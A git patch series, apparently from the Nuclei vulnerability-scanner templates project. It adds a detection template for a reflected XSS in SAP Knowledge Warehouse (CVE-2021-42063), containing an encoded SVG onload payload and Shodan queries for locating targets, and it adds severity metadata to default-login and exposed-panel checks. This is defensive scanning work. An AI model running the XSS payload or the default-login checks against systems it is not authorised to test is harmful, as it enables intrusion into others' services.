From 8c12450b093c5cd83ac5227c12fb93a5a29d3160 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 23 Mar 2022 16:13:38 +0530 Subject: [PATCH 1/7] Added CVE-2021-42063 (#3956) --- cves/2021/CVE-2021-42063.yaml | 41 +++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2021/CVE-2021-42063.yaml diff --git a/cves/2021/CVE-2021-42063.yaml b/cves/2021/CVE-2021-42063.yaml new file mode 100644 index 0000000000..38c3f6d98e --- /dev/null +++ b/cves/2021/CVE-2021-42063.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-42063 + +info: + name: SAP Knowledge Warehouse (KW) - Reflected XSS + author: pdteam + severity: medium + description: | + A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data. + reference: + - https://seclists.org/fulldisclosure/2022/Mar/32 + - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html + - https://twitter.com/MrTuxracer/status/1505934549217382409 + - https://nvd.nist.gov/vuln/detail/CVE-2021-42063 + metadata: + shodan-query: + - 'SAP NetWeaver Application Server' + - 'http.component:"SAP"' + tags: cve,cve2021,sap,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "SAPIKS2" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From a9024cc6f400a7b54a3c75d07e09e89c373f2320 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 23 Mar 2022 10:43:58 +0000 Subject: [PATCH 2/7] Auto Generated New Template Addition List [Wed Mar 23 10:43:58 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 52adcdd1d3..6210a6bfa2 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cnvd/2021/CNVD-2021-14536.yaml cves/2020/CVE-2020-17456.yaml cves/2020/CVE-2020-27467.yaml cves/2021/CVE-2021-41691.yaml +cves/2021/CVE-2021-42063.yaml cves/2022/CVE-2022-0437.yaml exposed-panels/beyondtrust-login-server.yaml exposed-panels/beyondtrust-panel.yaml From 83ecf7060b154b8da590993b24e38d1ceb757b84 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 23 Mar 2022 10:44:27 +0000 Subject: [PATCH 3/7] Auto Generated CVE annotations [Wed Mar 23 10:44:27 UTC 2022] :robot: --- cves/2021/CVE-2021-42063.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-42063.yaml b/cves/2021/CVE-2021-42063.yaml index 38c3f6d98e..e9cc437e9a 100644 --- a/cves/2021/CVE-2021-42063.yaml +++ b/cves/2021/CVE-2021-42063.yaml @@ -16,6 +16,11 @@ info: - 'SAP NetWeaver Application Server' - 'http.component:"SAP"' tags: cve,cve2021,sap,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-42063 + cwe-id: CWE-79 requests: - method: GET From 5a0cea7a1d63caba4fe60ebe2b7ab13bf2afc9d8 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 23 Mar 2022 09:33:16 -0400 Subject: [PATCH 4/7] Dashboard Content Enhancements (#3958) Dashboard Content Enhancements --- default-logins/alibaba/canal-default-login.yaml | 10 ++++++++++ .../alphaweb/alphaweb-default-login.yaml | 13 +++++++++++-- default-logins/ambari/ambari-default-login.yaml | 12 +++++++++++- default-logins/apache/airflow-default-login.yaml | 13 +++++++++++-- default-logins/apache/apisix-default-login.yaml | 16 +++++++++++++--- default-logins/apollo/apollo-default-login.yaml | 11 ++++++++++- default-logins/arl/arl-default-login.yaml | 10 +++++++++- .../digitalrebar/digitalrebar-default-login.yaml | 14 ++++++++++++-- .../mantisbt/mantisbt-default-credential.yaml | 14 ++++++++++++-- .../stackstorm/stackstorm-default-login.yaml | 13 +++++++++++-- dns/caa-fingerprint.yaml | 15 ++++++++++++--- exposed-panels/active-admin-exposure.yaml | 10 ++++++++++ exposed-panels/activemq-panel.yaml | 10 ++++++++++ 13 files changed, 142 insertions(+), 19 deletions(-) diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml index a4c4a1b801..7d2892ee31 100644 --- a/default-logins/alibaba/canal-default-login.yaml +++ b/default-logins/alibaba/canal-default-login.yaml @@ -3,8 +3,16 @@ id: canal-default-login info: name: Alibaba Canal Default Login author: pdteam + description: An Alibaba Canal default login was discovered. severity: high tags: alibaba,default-login + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -33,3 +41,5 @@ requests: words: - 'data":{"token"' - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/alphaweb/alphaweb-default-login.yaml b/default-logins/alphaweb/alphaweb-default-login.yaml index 6532087439..459227780c 100644 --- a/default-logins/alphaweb/alphaweb-default-login.yaml +++ b/default-logins/alphaweb/alphaweb-default-login.yaml @@ -4,8 +4,15 @@ info: name: AlphaWeb XE Default Login author: Lark Lab severity: medium + description: An AlphaWeb XE default login was discovered. tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -32,4 +39,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/ambari/ambari-default-login.yaml b/default-logins/ambari/ambari-default-login.yaml index e251839b56..3ebcf4c474 100644 --- a/default-logins/ambari/ambari-default-login.yaml +++ b/default-logins/ambari/ambari-default-login.yaml @@ -3,8 +3,16 @@ id: ambari-default-login info: name: Apache Ambari Default Login author: pdteam - severity: medium + description: An Apache Ambari default admin login was discovered. + severity: high tags: ambari,default-login,apache + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -24,3 +32,5 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/apache/airflow-default-login.yaml b/default-logins/apache/airflow-default-login.yaml index 0e15190cd6..30411f2786 100644 --- a/default-logins/apache/airflow-default-login.yaml +++ b/default-logins/apache/airflow-default-login.yaml @@ -3,11 +3,18 @@ id: airflow-default-login info: name: Apache Airflow Default Login author: pdteam - severity: critical + severity: high tags: airflow,default-login,apache - reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html metadata: shodan-query: title:"Sign In - Airflow" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -54,3 +61,5 @@ requests: - type: word words: - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/apache/apisix-default-login.yaml b/default-logins/apache/apisix-default-login.yaml index e3e9553a9a..926c485277 100644 --- a/default-logins/apache/apisix-default-login.yaml +++ b/default-logins/apache/apisix-default-login.yaml @@ -1,14 +1,22 @@ id: apisix-default-login info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical + severity: high tags: apisix,apache,default-login + description: An Apache Apisix default admin login was discovered. metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -39,4 +47,6 @@ requests: - '"data"' - '"token"' - '"code":0' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/apollo/apollo-default-login.yaml b/default-logins/apollo/apollo-default-login.yaml index 285bc75250..820ce3f661 100644 --- a/default-logins/apollo/apollo-default-login.yaml +++ b/default-logins/apollo/apollo-default-login.yaml @@ -4,10 +4,17 @@ info: name: Apollo Default Login author: PaperPen severity: high + description: An Apollo default login was discovered. metadata: shodan-query: http.favicon.hash:11794165 - reference: https://github.com/apolloconfig/apollo + reference: + - https://github.com/apolloconfig/apollo tags: apollo,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -47,3 +54,5 @@ requests: - "status_code_1 == 302 && status_code_2 == 200" - "contains(tolower(all_headers_2), 'application/json')" condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml index a7c16e40a9..9c0ac754fe 100644 --- a/default-logins/arl/arl-default-login.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -1,10 +1,16 @@ id: arl-default-login info: - name: ARL Default Login + name: ARL Default Admin Login author: pikpikcu + description: An ARL default admin login was discovered. severity: high tags: arl,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -35,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/digitalrebar/digitalrebar-default-login.yaml b/default-logins/digitalrebar/digitalrebar-default-login.yaml index f4b5228acc..edbd669ad2 100644 --- a/default-logins/digitalrebar/digitalrebar-default-login.yaml +++ b/default-logins/digitalrebar/digitalrebar-default-login.yaml @@ -1,11 +1,19 @@ id: digitalrebar-default-login info: - name: RackN Digital Rebar provision default login + name: RackN Digital Rebar Default Login author: c-sh0 severity: high - reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords + description: A RackN Digital Rebar default login was discovered. + reference: + - https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords + - https://rackn.com/ tags: rackn,digitalrebar,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -38,3 +46,5 @@ requests: - 'Name' - 'Secret' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/mantisbt/mantisbt-default-credential.yaml b/default-logins/mantisbt/mantisbt-default-credential.yaml index dfd4987666..f83a08252f 100644 --- a/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -1,12 +1,20 @@ id: mantisbt-default-credential info: - name: MantisBT Default Credential + name: MantisBT Default Admin Login author: For3stCo1d severity: high + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ metadata: shodan-query: title:"MantisBT" tags: mantisbt,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -34,4 +42,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/stackstorm/stackstorm-default-login.yaml b/default-logins/stackstorm/stackstorm-default-login.yaml index e27c21aad5..13c6a1b5d9 100644 --- a/default-logins/stackstorm/stackstorm-default-login.yaml +++ b/default-logins/stackstorm/stackstorm-default-login.yaml @@ -4,10 +4,17 @@ info: name: StackStorm Default Login author: PaperPen severity: high + description: A StackStorm default admin login was discovered. metadata: fofa-query: app="stackstorm" - reference: https://github.com/StackStorm/st2-docker + reference: + - https://github.com/StackStorm/st2-docker tags: stackstorm,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -35,4 +42,6 @@ requests: - type: status status: - - 201 \ No newline at end of file + - 201 + +# Enhanced by mp on 2022/03/22 diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml index 192f355a03..61d140a973 100644 --- a/dns/caa-fingerprint.yaml +++ b/dns/caa-fingerprint.yaml @@ -1,11 +1,18 @@ id: caa-fingerprint info: - name: CAA Fingerprint + name: CAA Record author: pdteam + description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain. severity: info - reference: https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record + reference: + - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record tags: dns,caa + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 dns: - name: "{{FQDN}}" @@ -22,4 +29,6 @@ dns: regex: - 'issue "(.*)"' - 'issuewild "(.*)"' - - 'iodef "(.*)"' \ No newline at end of file + - 'iodef "(.*)"' + +# Enhanced by mp on 2022/03/22 diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml index f4bdf291e6..48d7326c31 100644 --- a/exposed-panels/active-admin-exposure.yaml +++ b/exposed-panels/active-admin-exposure.yaml @@ -4,7 +4,15 @@ info: name: ActiveAdmin Admin Dasboard Exposure author: pdteam severity: info + description: An ActiveAdmin Admin dashboard was discovered. tags: panel,activeadmin + reference: + - https://activeadmin.info/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -16,3 +24,5 @@ requests: - "active_admin_content" - "active_admin-" condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml index a269d2dfe1..52daaf3deb 100644 --- a/exposed-panels/activemq-panel.yaml +++ b/exposed-panels/activemq-panel.yaml @@ -4,7 +4,15 @@ info: name: Apache ActiveMQ Exposure author: pdteam severity: info + description: An Apache ActiveMQ implementation was discovered. + reference: + - https://activemq.apache.org/ tags: panel,activemq,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -17,3 +25,5 @@ requests: - '

Welcome to the Apache ActiveMQ!

' - 'Apache ActiveMQ' condition: and + +# Enhanced by mp on 2022/03/22 From b6212b7529490f899b1258b1fddbe84645d733a2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 23 Mar 2022 20:55:35 +0530 Subject: [PATCH 6/7] workflow updates --- .github/workflows/new-templates.yml | 1 + .github/workflows/template-db-indexer.yml | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/new-templates.yml b/.github/workflows/new-templates.yml index 5188ff2a09..fa398b097e 100644 --- a/.github/workflows/new-templates.yml +++ b/.github/workflows/new-templates.yml @@ -9,6 +9,7 @@ on: jobs: templates: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@master with: diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index 3fbda9c1e5..19f985b0c9 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -2,8 +2,8 @@ name: 📑 Template-DB Indexer on: push: - tags: - - '*' + branches: + - master workflow_dispatch: jobs: